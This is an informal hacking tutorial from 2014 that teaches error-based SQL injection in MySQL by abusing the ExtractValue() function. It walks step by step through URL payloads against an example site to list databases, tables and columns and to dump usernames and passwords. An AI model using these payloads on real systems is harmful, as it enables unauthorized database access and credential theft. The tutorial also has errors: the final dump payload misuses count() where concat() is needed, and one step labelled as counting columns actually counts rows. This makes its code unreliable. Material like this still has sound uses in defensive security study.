After discussing Basic Injections, now we can move to XPATH injection frankly speaking this onez my favourite. Any body reading this tutorial i Suppose he read the "Complete Guide of SQL injection".

Now we can continue our discussion after the Basic Union based and Bypassing Row Limit injections comes XPATH. Things to keep in mind if you landed on this page searching for Specifically XPATH Based injection then let me tell you its the wrong place. Here we are not actually injecting into XPATH, we are just using one of the XPATH function which is Extractvalue() to generate error and get the output.

The &qout;ExtractValue&qout; function in MySQL runs an XPath query against a string representing XML data. The function takes input in the following form:

ExtractValue('xmldatahere', 'xpathqueryhere')

If the XPath query is syntactically incorrect, we are presented with an error message:

XPATH syntax error: 'xpathqueryhere'

Some n00bz like me may think, why we actually need this one? as we already have Union based injections!!

huh!!! yeah right...but some times Different queries and web application behaviour makes is difficult to inject some injections and a web application may be just checking the input validity and not showing any output from the database. So as per the conditions we may have to use different Injection to get our way into the database.

ohhh...so in what condition should i use this injection?

As per my experience most of the times the condition where we start injecting with a single qoute, double quote etc we get the error, well and good. We now comment out the query and start searching for the number of columns. huh we got the columns also using order by. Let us assume there were 5 columns.

Now when we inject Union Based injection, what the F..?? we cant see any output there. Earlier when we used to inject we gets an output which tells us the vulnerable column to inject. So this is the condition when you can depend on XPATH injection.

okay let us Start from the same condition we discussed above.5 columns found tried following Injection but no output.

www.vuln-web.com/index.php?view=-35" union select 1,2,3,4,5--


As you can see the double quote over there..that means this time we are injecting into a string type query where the query is like.

Query:
select path from pages where view="<our_input_here>" limit 1,1;


So let us continue our injection using XPATH injection.

www.vuln-web.com/index.php?view=-35" and extractvalue(0x0a,concat(0x0a,(OUR QUERY HERE)))--


Getting the Current Database :

www.vuln-web.com/index.php?view=-35" and extractvalue(0x0a,concat(0x0a,(select database())))--
Output : XPATH syntax error: ' database_name_here'


as we got the Database let us continue :D

Getting tables in current Database:

www.vuln-web.com/index.php?view=-35" and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))--
Output : XPATH syntax error: 'table_name_here'


as you can see i used limit as we cannot extract long data which limits upto 32 characters. So i prefer :P to go one by one increasing the row to get the output. well if you want to dump the database go for any tool or manual proxy else create your own script to get the data dumped for you which I prefer to be the best option.

So Now lets assume we got the following tables using the above Query:

  • Posts
  • Assets
  • Banner
  • Links
  • Users


Let us continue and try to get the columns:

www.vuln-web.com/index.php?view=-35" and extractvalue(0x0a,concat(0x0a,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1)))--
Output : XPATH syntax error: 'column_name_here'


Let Us say we got the 3 Columns:

  • id
  • username
  • password


Let us Dump the data from them, but before that lets count the number of Columns.

Counting the number of columns:

www.vuln-web.com/index.php?view=-35" and extractvalue(0x0a,concat(0x0a,(select count(username) from users)))--
Output : XPATH syntax error: 'count_will_come_here'


You can use the same trick to count the tables or columns also. So now let us continue dumping the data

www.vuln-web.com/index.php?view=-35" and extractvalue(0x0a,concat(0x0a,(select count(username,0x3a,password) from users limit 0,1)))--
Output : XPATH syntax error: 'Output_here'


If you have problem understand Limit or any other thing...i suggest to read the basics again.
Because whatever I used new I explained, what I dint explained was basics which I already covered earlier.

Author : Zenodermus Javanicus
Date : 2014-03-18